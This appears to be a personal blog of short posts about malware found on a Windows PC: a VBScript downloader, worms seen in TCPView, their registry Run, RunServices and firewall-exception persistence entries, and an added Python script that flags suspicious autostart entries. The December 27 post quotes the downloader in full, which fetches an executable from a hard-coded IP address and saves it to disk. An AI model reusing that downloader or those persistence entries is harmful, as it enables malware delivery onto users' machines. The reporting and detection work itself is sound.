
Blog


    December 27

    iget.vbe

    I just found a virus-like file under c:\; its content is:

    ' Fetch the payload over HTTP with the XMLHTTP COM object
    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "GET","http://222.66.200.102:8080/1/3.exe",0
    xPost.Send()
    ' Write the response body to disk through a binary ADODB stream
    Set sGet = CreateObject("ADODB.Stream")
    sGet.Mode = 3    ' adModeReadWrite
    sGet.Type = 1    ' adTypeBinary
    sGet.Open()
    sGet.Write(xPost.responseBody)
    sGet.SaveToFile "C\1.exe",2    ' adSaveCreateOverWrite

    December 05

    mravsc32.exe

    This worm created a lot of TCP connections and affected normal internet usage. It spawns another process once it is killed. Well, I can suspend it and then google for a solution.

    August 04

    sddriver.exe

    sddriver.exe seems to be a worm; it initiated a lot of connections (they can
    be seen in TCPView.exe) and affected normal use of the web browser. It is
    found in the following registry entries, but the file is not found on disk.
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
        Call Function System32=C:\WINDOWS\system32\Com\sddriver.exe
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
        C:\WINDOWS\system32\Com\sddriver.exe=C:\WINDOWS\system32\Com\sddriver.exe:*:Enabled:Call Function System32


    July 16

    Firefox displays blank page for many urls

    Today while I was surfing the internet, Firefox suddenly couldn't open new pages correctly -- they were just blank. After launching TCPView.exe I found rundll.exe (PID=4848) making lots of connection attempts, much like a virus/worm, so I killed it and Firefox resumed working correctly. The sad thing was that my virus protection software failed to protect my system.

    June 21

    wishs.exe -- virus or worm?

    Wishs.exe is found in the following registry entries:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    Microsoft=wishs.exe
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
    Microsoft=wishs.exe
    [HKEY_USERS\.DEFAULT\Software\ASProtect]
    Microsoft=wishs.exe
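    The sddriver.exe and wishs.exe posts both show persistence through the Run/RunServices keys, and sddriver.exe also appears in the Windows Firewall AuthorizedApplications list. As an added example (not code from this blog), the Python script below parses a .reg-style export of those keys and flags autostart entries that use a vendor-like value name, a bare file name, both Run and RunServices, or a matching firewall authorization. The sample export is constructed from the entries quoted in the two posts, and the VENDOR_NAMES list and the heuristics are assumptions of this example.

```python
import re
from collections import defaultdict
# Constructed .reg-style export reproducing the entries quoted in the posts above
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft"="wishs.exe"
"Call Function System32"="C:\\WINDOWS\\system32\\Com\\sddriver.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Microsoft"="wishs.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\system32\\Com\\sddriver.exe"="C:\\WINDOWS\\system32\\Com\\sddriver.exe:*:Enabled:Call Function System32"
'''
KEY_RE = re.compile(r'^\[(.+)\]$')
VAL_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
unescape = lambda s: re.sub(r'\\(.)', r'\1', s)  # .reg escapes \ and " with a backslash
VENDOR_NAMES = {'microsoft', 'windows', 'system32'}  # assumed vendor-like value names

def parse_reg(text):
    """Yield (key, value_name, data) for every string value in a .reg export."""
    key = None
    for line in text.splitlines():
        if m := KEY_RE.match(line.strip()):
            key = m.group(1)
        elif key and (m := VAL_RE.match(line.strip())):
            yield key, unescape(m.group(1)), unescape(m.group(2))

def triage(text):
    """Return {executable: sorted reasons} for autostart entries that deserve a closer look."""
    reasons, seen_in, fw_auth = defaultdict(set), defaultdict(set), set()
    for key, name, data in parse_reg(text):
        kl = key.lower()
        if kl.endswith(('\\currentversion\\run', '\\currentversion\\runservices')):
            # Quoted program path if present, otherwise the first token; lower-cased for matching
            exe = (data[1:].split('"')[0] if data.startswith('"') else data.split(' ')[0]).lower()
            seen_in[exe].add(kl.rsplit('\\', 1)[1])
            if name.lower() in VENDOR_NAMES:
                reasons[exe].add('value name impersonates vendor')
            if '\\' not in exe:
                reasons[exe].add('bare file name resolved via search path')
        elif kl.endswith('\\authorizedapplications\\list'):
            path, _scope, state, _label = data.rsplit(':', 3)  # "path:scope:Enabled:label"
            if state == 'Enabled':
                fw_auth.add(path.lower())
    for exe, keys in seen_in.items():
        if len(keys) > 1:
            reasons[exe].add('registered in both Run and RunServices')
        if exe in fw_auth:
            reasons[exe].add('also authorized in the firewall exception list')
    return {exe: sorted(r) for exe, r in reasons.items()}
```

    Run it against a real export (reg export of the same keys) to get the same report for a live machine; the firewall label parsing assumes the display name holds no colons.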